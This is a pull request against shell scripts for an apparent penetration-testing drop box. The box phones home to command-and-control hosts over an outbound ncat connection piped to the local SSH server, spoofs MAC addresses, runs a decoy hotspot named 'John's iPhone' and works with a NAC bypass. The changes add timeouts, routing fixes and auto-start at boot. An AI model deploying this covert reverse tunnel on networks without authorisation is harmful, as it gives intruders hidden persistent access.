### PR TITLE
Several improvements

### DIFF
--- a/config.sh
+++ b/config.sh
@@ -17,7 +17,7 @@
 
 
 # Array of MACs of all interfaces that may be used to phone home.
-MACS=()
+MACS=("ca:fe:ba:be:ca:fe" "ba:be:ca:fe:ca:fe")
 
 # List of ip:port combinations to try to ssh into. Values here just for
 # reference.
@@ -38,7 +38,7 @@ SSHD_BIN=""
 DISABLE_HOTSPOT=0
 
 # Access point name
-AP_ESSID="John's Iphone"
+AP_ESSID="John's iPhone"
 
 # Access point password
 AP_PASS="changeme123"
@@ -63,6 +63,10 @@ FAILURE_REBOOT=1
 # Set to 1 to report check failures to /tmp/usb_chk_log without taking further
 # action
 USB_DEBUG=0
+
+# Set to 1 to preserve the configuration and not overwrite it during the
+# preparation in case it already exists.
+PRESERVE_CONFIGURATION=0
 
 # A known good output of lsusb goes here. What is bad lsusb output? Any output
 # containing devices that are not expected. If unexpected devices show up, the

--- a/phone_home.sh
+++ b/phone_home.sh
@@ -263,7 +263,7 @@ main() {
             _port="${_elem##*:}"
 
             [[ -n $(hping3 --syn -c 3 $_host -p $_port | grep -m 1 -io "flags=SA") ]] &&
-            ncat $_host $_port --wait 10 --sh-exec "ncat 127.0.0.1 $SSHD_PORT"
+            ncat $_host $_port --wait 10 --idle-timeout 15 --sh-exec "ncat 127.0.0.1 $SSHD_PORT --idle-timeout 15"
         done
 
         sleep 60

--- a/phone_home.sh
+++ b/phone_home.sh
@@ -37,6 +37,8 @@ source "${_scriptdir}/config.sh"
 iprgx='((1?[0-9][0-9]?|25[0-5]|2[0-4][0-9])\.){3}(1?[0-9][0-9]?|25[0-5]|2[0-4][0-9])'
 
 start_hotspot() {
+    pkill hostapd
+    ip addr flush dev $WIRELESS_IFACE
     ip l set dev $WIRELESS_IFACE up
     ip a add $AP_IP dev $WIRELESS_IFACE
     udhcpd "$UDHCPD_DIR/$UDHCPD_FILE"

--- a/phone_home.sh
+++ b/phone_home.sh
@@ -206,6 +206,9 @@ conf_iface() {
         dhclient "$_iface" #retry once on failure
     } || reboot
 
+    _gw=$(ip route show default dev $_iface | grep -oE "$iprgx")
+    ip route del default dev "$_iface"
+
     cat /dev/null >/etc/resolv.conf
 }
 
@@ -233,7 +236,6 @@ main() {
             # c&c traffic should use the designated interface, also whitelist c&c
             # traffic so the NAC bypass script doesn't lock the pentester out.
             
-            _gw=$(ip route show default dev $_iface | grep -oE "$iprgx")
             ip route del default dev $_iface
 
             for _host in "${HOMES[@]%:*}"

--- a/phone_home.sh
+++ b/phone_home.sh
@@ -153,9 +153,9 @@ wake_iface() {
     local _wait=0
     local _icmp_dst='1.1.1.1'
     local _del_route=0
-    [[ -z "$(ip route show default via "$_gw" dev "$_iface")" ]] &&
+    [[ -z "$(ip route show "$_icmp_dst" via "$_gw" dev "$_iface")" ]] &&
     {
-        ip route add default via "$_gw" dev "$_iface"
+        ip route add "$_icmp_dst" dev "$_iface" proto static scope global via "$_gw"
         _del_route=1
     }
 
@@ -166,7 +166,7 @@ wake_iface() {
 
         ((${loss%%%*}<100)) &&
         {
-            ((_del_route)) && ip route del default via "$_gw" dev "$_iface"
+            ((_del_route)) && ip route del "$_icmp_dst" via "$_gw" dev "$_iface"
             return 0
         }
 

--- a/prep.sh
+++ b/prep.sh
@@ -19,13 +19,15 @@
 
 ((UID == 0 || EUID == 0)) || { echo "Script needs root permissions to install packages and write config files" >&2; exit 1; }
 
-apt install udhcpd hping3 ncat iptables usb-modeswitch
+apt install udhcpd hostapd hping3 ncat iptables usb-modeswitch
 
-source config.sh
+_scriptdir=$(dirname "$(readlink -f "$0")")
+
+source "${_scriptdir}/config.sh"
 
 [[ -d "$UDHCPD_DIR" ]] || mkdir -pm 755 "$UDHCPD_DIR"
 
-if [[ -f "$UDHCPD_DIR/$UDHCPD_FILE" ]]
+if [[ -f "$UDHCPD_DIR/$UDHCPD_FILE" && "$PRESERVE_CONFIGURATION" == 1 ]]
 then
     echo "$UDHCPD_DIR/$UDHCPD_FILE exists; will not overwrite"
 else
@@ -34,7 +36,7 @@ fi
 
 [[ -d "$HOSTAPD_DIR" ]] || mkdir -pm 755 "$HOSTAPD_DIR"
 
-if [[ -f "$HOSTAPD_DIR/$HOSTAPD_FILE" ]]
+if [[ -f "$HOSTAPD_DIR/$HOSTAPD_FILE" && "$PRESERVE_CONFIGURATION" == 1 ]]
 then
     echo "$HOSTAPD_DIR/$HOSTAPD_FILE exists, will not overwrite"
 else
@@ -43,10 +45,12 @@ fi
 
 [[ -d "$UNIT_FILE_DIR" ]] || { echo "Systemd directory not found: $UNIT_FILE_DIR" >&2; exit 1; }
 
-if [[ -f "$UNIT_FILE_DIR/$UNIT_FILE_NAME" ]]
+if [[ -f "$UNIT_FILE_DIR/$UNIT_FILE_NAME" && "$PRESERVE_CONFIGURATION" == 1 ]]
 then
     echo "$UNIT_FILE_DIR/$UNIT_FILE_NAME exists, will not overwrite"
     echo "Make sure the path to the phone_home script in the unit file is correct"
 else
     printf "%s" "$UNIT_FILE_CONF" >"$UNIT_FILE_DIR/$UNIT_FILE_NAME"
 fi
+
+systemctl enable "$UNIT_FILE_NAME"


### PR DESCRIPTION
Thanks a lot for the scripts! While using them, we thought that we could improve them a bit, here are the changes we propose:
- Add the option to overwrite the configuration even if the file exists
- Install hostapd
- Allow launching prep.sh from anywhere
- Enable the service at the end of the preparation
- Prevent defining static routes (works better with nac_bypass)
- Read _gw after the gateway is known
- Delete the default gateway after doing dhclient (works better with nac_bypass)
- Make sure to be able to start the hotspot
- Define timeouts for the ncat to prevent hanging connections blocking the "phone home" function (configure "ClientAliveInterval 10" on the SSH server)
